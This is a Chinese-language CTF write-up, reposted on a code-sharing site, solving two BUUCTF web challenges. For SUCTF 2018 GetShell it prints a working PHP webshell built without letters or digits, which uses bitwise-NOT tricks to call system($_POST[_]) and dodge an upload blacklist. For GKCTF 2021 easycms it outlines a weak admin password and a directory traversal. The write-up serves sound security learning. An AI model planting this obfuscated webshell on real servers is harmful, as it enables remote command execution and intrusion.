码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • buu web部分wp


    [SUCTF 2018]GetShell

    打开题目,要进行getshell
    在这里插入图片描述
    上传文件,然后截取内容,从第六位开始的内容都会赋给data,然后会有一个黑名单一样的东西,如果data中存在黑名单字符,就会die。
    fuzz之后,数字及英文字母都被过滤了
    查看资料:一些不包含数字和字母的webshell
    发现需要使用文章中第二种的方式
    在这里插入图片描述
    没有过滤的字符有$ ( ) [ ] _ ~ ;

    
    $_=[]; //
    $__=$_.$_; //arrayarray
    $_=($_==$__);//$_=(array==arrayarray)明显不相同 false 0
    $__=($_==$_);//$__=(array==array) 相同返回1
    
    $___ = ~区[$__].~冈[$__].~区[$__].~勺[$__].~皮[$__].~针[$__];//system
    $____ = ~码[$__].~寸[$__].~小[$__].~欠[$__].~立[$__];//_POST
    
    
    $____($$__[_]);//也就是system($_POST[_])
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11

    payload:

    $_=[];$__=$_.$_;$_=($_==$__);$__=($_==$_);$___=~区[$__].~冈[$__].~区[$__].~勺[$__].~皮[$__].~针[$__];$____=~码[$__].~寸[$__].~小[$__].~欠[$__].~立[$__];$___($$____[_]);
    
    • 1

    直接上传一个php文件
    在这里插入图片描述

    没得到flag,查看其它wp知道环境有点问题,flag不在这里,但是可以使用env来得到flag
    在这里插入图片描述

    [GKCTF 2021]easycms

    提示:在这里插入图片描述
    进入admin.php页面,使用admin 12345成功登录,发现可以进行网页编辑,但是需要权限
    在这里插入图片描述
    在微信这里存在目录穿越
    在这里插入图片描述
    随便上传一张图片
    在这里插入图片描述

    回到编辑页面
    在这里插入图片描述
    编辑代码,拿到flag
    在这里插入图片描述

  • 相关阅读:
    自学5个月软件测试找到一个8k的工作,我的学习方式值得你借鉴
    CTFhub-文件上传-.htaccess
    【强化学习论文合集 | 2019年合集】二. AAAI-2019 强化学习论文
    并查集的简单学习笔记
    【最全最详细索引失效】索引失效的10种场景,数据库优化
    使用 Clion (cmake) 开发FreeRTOS
    易点易动固定资产管理系统:高效完成固定资产盘点任务
    计算机毕业设计python基于django在线古诗词学习系统
    【机器学习大杀器】Stacking堆叠模型
    button样式
  • 原文地址:https://blog.csdn.net/qq_63267612/article/details/126452995
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号